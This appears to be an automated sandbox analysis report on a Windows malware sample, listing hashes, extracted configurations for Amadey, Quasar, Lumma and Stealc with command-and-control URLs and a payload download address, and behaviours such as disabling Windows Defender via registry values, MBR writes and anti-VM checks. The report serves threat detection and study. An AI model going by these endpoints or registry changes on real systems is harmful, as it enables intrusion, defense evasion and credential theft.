Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
30/03/2025, 14:03
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
84c300a105cb5e140c8c91e2c6ead590
-
SHA1
5bd18b75d71b2824913a508ce28db8d4c2a936b9
-
SHA256
edfb2e4f23a9c490eb887fe69d57aab4dea230d0b76e3b1c95babb559c36fa58
-
SHA512
eec8f1abe337ec6e09cdf613c015a1cf84a58217f063d884e4a4ef8a925f17f8c7c869ce81e081e81382cb5860cdc46f1b4cb96923b97c0d41e76dd98d99f106
-
SSDEEP
24576:oqDEvCTbMWu7rQYlBQcBiT6rprG8a06u:oTvC/MTQYxsWR7a06
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Extracted
lumma
https://navstarx.shop/FoaJSi
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://rodformi.run/aUosoz
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/10540-31270-0x0000000000B10000-0x0000000000F6E000-memory.dmp healer behavioral2/memory/10540-31286-0x0000000000B10000-0x0000000000F6E000-memory.dmp healer behavioral2/memory/10540-31642-0x0000000000B10000-0x0000000000F6E000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 27b80601f6.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 27b80601f6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 27b80601f6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 27b80601f6.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 27b80601f6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 27b80601f6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 27b80601f6.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 27b80601f6.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 27b80601f6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 27b80601f6.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/2268-130-0x0000000007EA0000-0x0000000007EBA000-memory.dmp family_quasar behavioral2/memory/2268-129-0x0000000007D10000-0x0000000007E64000-memory.dmp family_quasar -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 6128 created 972 6128 MSBuild.exe 51 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 27b80601f6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 17309ae496.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ eea22fbd05.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ae27dc3fa3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4258008d71.exe -
Blocklisted process makes network request 7 IoCs
flow pid Process 20 1544 powershell.exe 31 2268 powershell.exe 71 2268 powershell.exe 149 2268 powershell.exe 165 2268 powershell.exe 264 2268 powershell.exe 305 2268 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4024 powershell.exe 4580 powershell.exe 1544 powershell.exe 2268 powershell.exe -
Downloads MZ/PE file 9 IoCs
flow pid Process 61 3592 rapes.exe 28 3592 rapes.exe 60 4440 svchost.exe 106 3592 rapes.exe 106 3592 rapes.exe 106 3592 rapes.exe 106 3592 rapes.exe 20 1544 powershell.exe 58 3592 rapes.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\Drivers\9e186137.sys 81a4e8fe.exe File created C:\Windows\System32\Drivers\klupd_9e186137a_arkmon.sys 81a4e8fe.exe -
Sets service image path in registry 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QDgAc_3648\ImagePath = "\\??\\C:\\Windows\\Temp\\gJt1b9_3648.sys" tzutil.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\9e186137\ImagePath = "System32\\Drivers\\9e186137.sys" 81a4e8fe.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_arkmon\ImagePath = "System32\\Drivers\\klupd_9e186137a_arkmon.sys" 81a4e8fe.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 17309ae496.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 27b80601f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 17309ae496.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion eea22fbd05.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4258008d71.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion eea22fbd05.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ae27dc3fa3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4258008d71.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ae27dc3fa3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 27b80601f6.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation 81a4e8fe.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation rapes.exe -
Deletes itself 1 IoCs
pid Process 3836 w32tm.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c2309d9f.cmd powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c2309d9f.cmd powershell.exe -
Executes dropped EXE 23 IoCs
pid Process 2736 TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE 3592 rapes.exe 2512 kO2IdCz.exe 2832 Rm3cVPI.exe 5388 TbV75ZR.exe 3956 rapes.exe 4844 7IIl2eE.exe 5724 u75a1_003.exe 2380 Passwords.com 4472 17309ae496.exe 3648 tzutil.exe 3836 w32tm.exe 7028 EPTwCQd.exe 5352 eea22fbd05.exe 7508 bd762c8745.exe 7816 ae27dc3fa3.exe 4952 661d2f9c.exe 2672 4258008d71.exe 3188 81a4e8fe.exe 12780 rapes.exe 12444 44f5ba506b.exe 10540 27b80601f6.exe 5656 rapes.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 4258008d71.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 17309ae496.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine eea22fbd05.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine ae27dc3fa3.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 27b80601f6.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys\ = "Driver" 81a4e8fe.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys 81a4e8fe.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys 81a4e8fe.exe -
Loads dropped DLL 15 IoCs
pid Process 3188 81a4e8fe.exe 3188 81a4e8fe.exe 3188 81a4e8fe.exe 3188 81a4e8fe.exe 3188 81a4e8fe.exe 3188 81a4e8fe.exe 3188 81a4e8fe.exe 3188 81a4e8fe.exe 3188 81a4e8fe.exe 3188 81a4e8fe.exe 3188 81a4e8fe.exe 3188 81a4e8fe.exe 3188 81a4e8fe.exe 3188 81a4e8fe.exe 3188 81a4e8fe.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 27b80601f6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 27b80601f6.exe -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\27b80601f6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381880101\\27b80601f6.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" kO2IdCz.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ae27dc3fa3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381850101\\ae27dc3fa3.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ab46dfaa-8c5a-473f-9c3e-8c0f4debbbca = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{d082aa7e-6cdb-4325-8b76-01a5f4c44c90}\\ab46dfaa-8c5a-473f-9c3e-8c0f4debbbca.cmd\"" 81a4e8fe.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4258008d71.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381860101\\4258008d71.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\44f5ba506b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381870101\\44f5ba506b.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 81a4e8fe.exe File opened for modification \??\PHYSICALDRIVE0 17309ae496.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000500000001ee9f-31200.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 4256 tasklist.exe 5212 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 2736 TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE 3592 rapes.exe 3956 rapes.exe 4472 17309ae496.exe 5352 eea22fbd05.exe 7816 ae27dc3fa3.exe 2672 4258008d71.exe 12780 rapes.exe 10540 27b80601f6.exe 5656 rapes.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5388 set thread context of 6128 5388 TbV75ZR.exe 121 PID 7028 set thread context of 7048 7028 EPTwCQd.exe 160 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 661d2f9c.exe File opened (read-only) \??\VBoxMiniRdrDN 81a4e8fe.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4836 6128 WerFault.exe 121 -
System Location Discovery: System Language Discovery 1 TTPs 44 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4258008d71.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 27b80601f6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 17309ae496.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eea22fbd05.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bd762c8745.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 44f5ba506b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 81a4e8fe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 44f5ba506b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ae27dc3fa3.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 44f5ba506b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language u75a1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 661d2f9c.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 10192 PING.EXE 9768 PING.EXE 10604 PING.EXE 12180 PING.EXE 6428 PING.EXE 11752 PING.EXE 11052 PING.EXE 9424 PING.EXE 9644 PING.EXE 10640 PING.EXE 11628 PING.EXE 6380 PING.EXE 11196 PING.EXE 10300 PING.EXE 9992 PING.EXE 10836 PING.EXE 12944 PING.EXE 11088 PING.EXE 9744 PING.EXE 11904 PING.EXE 12308 PING.EXE 13108 PING.EXE 12740 PING.EXE 1836 PING.EXE 11520 PING.EXE 11648 PING.EXE 12044 PING.EXE 12552 PING.EXE 13020 PING.EXE 6408 PING.EXE 13016 PING.EXE 12760 PING.EXE 4576 PING.EXE 10396 PING.EXE 10856 PING.EXE 12324 PING.EXE 6980 PING.EXE 12988 PING.EXE 12164 PING.EXE 6528 PING.EXE 11948 PING.EXE 11504 PING.EXE 10508 PING.EXE 10268 PING.EXE 10748 PING.EXE 13076 PING.EXE 13036 PING.EXE 12416 PING.EXE 11860 PING.EXE 11412 PING.EXE 13156 PING.EXE 5136 PING.EXE 13220 PING.EXE 11136 PING.EXE 9932 PING.EXE 11308 PING.EXE 6372 PING.EXE 13288 PING.EXE 6476 PING.EXE 12640 PING.EXE 6184 PING.EXE 10940 PING.EXE 12932 PING.EXE 6752 PING.EXE -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 12400 taskkill.exe 6312 taskkill.exe 12244 taskkill.exe 12128 taskkill.exe 12028 taskkill.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings rapes.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 12848 reg.exe 12832 reg.exe -
Runs ping.exe 1 TTPs 64 IoCs
pid Process 13020 PING.EXE 13156 PING.EXE 11772 PING.EXE 6184 PING.EXE 11220 PING.EXE 11088 PING.EXE 10508 PING.EXE 9880 PING.EXE 11344 PING.EXE 10396 PING.EXE 13076 PING.EXE 13016 PING.EXE 12268 PING.EXE 10708 PING.EXE 10192 PING.EXE 4576 PING.EXE 12492 PING.EXE 13212 PING.EXE 13124 PING.EXE 13036 PING.EXE 11412 PING.EXE 9992 PING.EXE 9744 PING.EXE 10748 PING.EXE 11648 PING.EXE 6980 PING.EXE 13108 PING.EXE 12640 PING.EXE 10972 PING.EXE 12944 PING.EXE 6752 PING.EXE 12856 PING.EXE 11752 PING.EXE 11904 PING.EXE 12988 PING.EXE 3600 PING.EXE 13240 PING.EXE 12416 PING.EXE 10836 PING.EXE 11520 PING.EXE 12044 PING.EXE 6408 PING.EXE 13220 PING.EXE 12740 PING.EXE 10300 PING.EXE 9644 PING.EXE 12324 PING.EXE 13304 PING.EXE 11196 PING.EXE 10940 PING.EXE 9768 PING.EXE 10640 PING.EXE 6372 PING.EXE 12760 PING.EXE 5136 PING.EXE 11948 PING.EXE 10384 PING.EXE 9424 PING.EXE 9668 PING.EXE 12164 PING.EXE 6528 PING.EXE 6264 PING.EXE 13112 PING.EXE 12852 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3064 schtasks.exe -
